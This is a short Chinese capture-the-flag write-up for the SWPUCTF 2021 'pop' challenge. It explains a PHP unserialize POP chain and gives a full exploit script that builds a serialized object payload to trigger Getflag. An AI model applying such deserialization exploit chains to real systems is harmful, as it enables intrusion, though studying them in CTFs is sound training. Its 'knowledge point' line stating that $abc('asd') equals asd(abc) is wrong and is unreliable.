[SWPUCTF 2021 新生赛]pop
~~你这个取名真的可以的~~ 1. 审计源码 2. 寻找pop链
知识点: 变量后面加括号是动态调用函数
$abc('asd')
等价于
asd(abc);
unserialize -> w22m.__construct -> w22m.__destruct -> w33m.__toString -> w44m.__construct & w44m.Getflag
- 编写exp
<?php
class w44m
{
private $admin = 'aaa';
protected $passwd = '123456';
public function __construct()
{
$this->admin = 'w44m';
$this->passwd = '08067';
}
public function Getflag()
{
if ($this->admin === 'w44m' && $this->passwd === '08067') {
include('flag.php');
echo $flag;
} else {
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w33m
{
public $w00m;
public $w22m;
public function __toString()
{
$this->w00m->{$this->w22m}();
return 0;
}
public function __construct(){
$this->w22m = "Getflag";
$this->w00m = new w44m;
}
}
class w22m
{
public $w00m;
public function __destruct()
{
echo $this->w00m;
}
public function __construct()
{
$this->w00m = new w33m;
}
}
$a = new w22m;
echo "?w00m=".urlencode(serialize($a))
?>